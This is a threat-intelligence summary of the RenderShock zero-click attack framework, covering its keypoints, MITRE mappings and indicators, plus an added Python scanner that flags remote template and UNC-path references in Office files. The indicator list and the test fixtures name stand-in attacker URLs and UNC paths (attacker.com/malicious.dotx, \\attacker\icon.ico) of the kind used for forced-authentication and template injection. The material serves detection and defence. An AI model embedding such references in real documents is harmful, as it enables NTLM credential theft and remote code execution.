RenderShock is a zero-click attack framework that exploits passive file preview, indexing, and automation in modern operating systems to execute malicious payloads without user interaction. It leverages trusted system features to perform reconnaissance, credential theft, remote code execution, and persistence, posing significant stealth and detection challenges. #RenderShock #NTLMLeak #RemoteTemplateInjection
Keypoints
- RenderShock exploits passive execution surfaces such as file preview panes, metadata indexers, antivirus scans, and cloud sync tools to trigger payloads without user clicks.
- Payloads include foundational types like PDFs with external references and .lnk files with UNC paths, as well as advanced zero-click triggers like polyglot files and remote template injection in Office documents.
- Delivery methods involve placing malicious files in shared mailboxes, cloud drives, USB drops, and helpdesk uploads where systems automatically process them.
- The attack chain includes reconnaissance via NTLM hash leaks, remote code execution through macros or PowerShell, persistence via auto-start files, and lateral movement using harvested credentials.
- RenderShock uses evasion techniques such as mixing file formats, delayed execution, sandbox checks, and network traffic blending to avoid detection by AV, EDR, and network monitoring.
- Recommended defenses include disabling preview features, restricting outbound SMB traffic, sandboxing file processing pipelines, behavioural monitoring, and deploying deception tactics like decoy files.
- Real-world precedents include exploits used by APT28, Darktrace red team, and documented vulnerabilities in Office and macOS preview engines validating RenderShock's techniques.
MITRE Techniques
- [T1203] Exploitation for Client Execution - via passive rendering of malicious files triggering code execution without user clicks.
- [T1059.001] Command and Scripting Interpreter: PowerShell - used for reverse shell payloads triggered by .lnk files or macros.
- [T1204.002] User Execution: Malicious File - activated by preview mechanisms rather than explicit user actions.
- [T1187] Forced Authentication - leveraging UNC paths in previewed documents or .lnk files to harvest NTLM hashes ("...embedded UNC icon paths cause SMB authentication attempts...").
- [T1557.001] Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay - enabling relay of harvested NTLM credentials.
- [T1016] System Network Configuration Discovery - achieved via passive beaconing through file previews and metadata extraction.
- [T1082] System Information Discovery - reconnaissance of host and user details from preview-triggered authentication or callbacks.
- [T1547.009] Shortcut Modification - use of .lnk or desktop.ini files for auto-execution persistence.
- [T1037.001] Boot or Logon Initialization Scripts - employing LaunchAgents and similar mechanisms for persistence.
- [T1021.002] Remote Services: SMB/Windows Admin Shares - lateral movement using harvested credentials.
- [T1005] Data from Local System - collection of metadata and clipboard contents from compromised endpoints.
- [T1055.013] Process Injection: PowerShell - for delivering reverse shell payloads covertly.
- [T1071.001] Application Layer Protocol: Web - HTTP/S used for C2 beaconing and shell transport.
- [T1499.004] Endpoint Denial of Service: Application or Service Crash - induced by malformed EXIF or corrupted file structures.
Indicators of Compromise
- [File Hashes] Malicious documents and payloads - examples include an fpdf-generated PDF with an external SMB image, and ZIP archives containing crafted .lnk files for NTLM hash leakage.
- [File Names] Exploit delivery files - Q3-Financials.lnk (malicious shortcut), recon.pdf (SMB beacon PDF), malicious.dotx (remote template injection), beacon.png (polyglot PNG+HTML file).
- [IP Addresses] Attacker SMB server used for capturing NTLMv2 hashes - e.g., Kali Linux IP running the Responder tool.
- [Domains/URLs] Malicious resource locations - http://attacker/shell, http://attacker.com/malicious.dotx for remote template retrieval and payload hosting.
- [UNC Paths] Remote icon or template references triggering forced authentication - \\attacker\icon.ico, \\attacker\icons\malicious.dll.
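The indicators above (remote template references and UNC paths embedded in Office documents) can be checked for before a file ever reaches a preview pane or indexer, which is the kind of sandboxed file-processing control the defenses section recommends. The following Python script is an added example for this summary, not code from the CYFIRMA article or from RenderShock: it opens an OOXML archive (.docx/.dotx/.xlsx/.pptx are all ZIP containers) and inspects every relationship part for targets marked External, flagging an attachedTemplate that points at an HTTP(S) URL (remote template injection) and any target that is a UNC path (forced SMB authentication). The sample archives, the relationship layouts, the hostname attacker.invalid and the file names it uses are constructed for the example.

```python
"""Scan OOXML (Word/Excel/PowerPoint) archives for external relationship targets.

Added example, not code from the CYFIRMA article or RenderShock. The archives
built below are constructed test fixtures, not real Office files.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"

# A UNC path (\\host\share\...) or file:// URI makes Office/Explorer reach out over SMB.
UNC_RE = re.compile(r"^(\\\\|file://)", re.IGNORECASE)
URL_RE = re.compile(r"^https?://", re.IGNORECASE)

# Findings of these kinds are what this scanner treats as block-worthy.
HIGH_RISK_KINDS = {"remote-template", "unc-forced-auth"}


def classify(rel_type: str, target: str) -> str:
    """Label one external relationship target by the behaviour it would trigger."""
    if UNC_RE.match(target):
        return "unc-forced-auth"          # SMB authentication attempt on open/preview
    if URL_RE.match(target) and rel_type == "attachedTemplate":
        return "remote-template"          # template fetched from a web server on open
    if URL_RE.match(target):
        return "external-url"             # e.g. an ordinary hyperlink; not by itself malicious
    return "external-other"


def scan_ooxml(data: bytes) -> list[dict]:
    """Return one finding per External relationship in every *.rels part of the archive."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{PKG_REL_NS}}}Relationship"):
                # Internal relationships point at parts inside the ZIP; only External ones leave the host.
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                target = rel.get("Target", "")
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                findings.append({"part": name, "type": rel_type, "target": target,
                                 "kind": classify(rel_type, target)})
    return findings


def is_suspicious(findings: list[dict]) -> bool:
    """True if any finding is a remote template or a UNC/forced-auth reference."""
    return any(f["kind"] in HIGH_RISK_KINDS for f in findings)


def build_sample(parts: dict[str, list[tuple[str, str, str]]]) -> bytes:
    """Construct a minimal OOXML-style ZIP whose .rels parts contain the given
    (relationship type, target, TargetMode) triples. Test fixture only."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        for part, rels in parts.items():
            xml = [f'<Relationships xmlns="{PKG_REL_NS}">']
            for i, (rel_type, target, mode) in enumerate(rels, 1):
                xml.append(f'<Relationship Id="rId{i}" Type="{OFFICE_REL}/{rel_type}" '
                           f'Target="{target}" TargetMode="{mode}"/>')
            xml.append("</Relationships>")
            zf.writestr(part, "".join(xml))
    return buf.getvalue()


# Constructed sample: a template document with a remote attachedTemplate and a linked image on a UNC share.
SUSPICIOUS_SAMPLE = build_sample({
    "word/_rels/settings.xml.rels": [
        ("attachedTemplate", "http://attacker.invalid/malicious.dotx", "External"),
    ],
    "word/_rels/document.xml.rels": [
        ("styles", "styles.xml", "Internal"),
        ("image", r"\\attacker.invalid\icons\logo.png", "External"),
    ],
})

# Constructed sample: an ordinary document whose only external reference is a hyperlink.
BENIGN_SAMPLE = build_sample({
    "word/_rels/document.xml.rels": [
        ("styles", "styles.xml", "Internal"),
        ("hyperlink", "https://example.org/", "External"),
    ],
})

if __name__ == "__main__":
    for label, sample in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        found = scan_ooxml(sample)
        print(f"{label}: suspicious={is_suspicious(found)}")
        for f in found:
            print(f"  {f['kind']:16} {f['part']} ({f['type']}) -> {f['target']}")
```

Run it against a real file with `scan_ooxml(open(path, "rb").read())`; the scanner only reads relationship metadata, so it never renders the document and is safe to put in front of a mail gateway, shared-drive crawler or helpdesk upload handler. A hyperlink to a web URL is reported but not treated as high risk, because that is normal document content; the two kinds the page describes as zero-click triggers are what `is_suspicious` acts on.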
Read more: https://www.cyfirma.com/research/rendershock-weaponizing-trust-in-file-rendering-pipelines/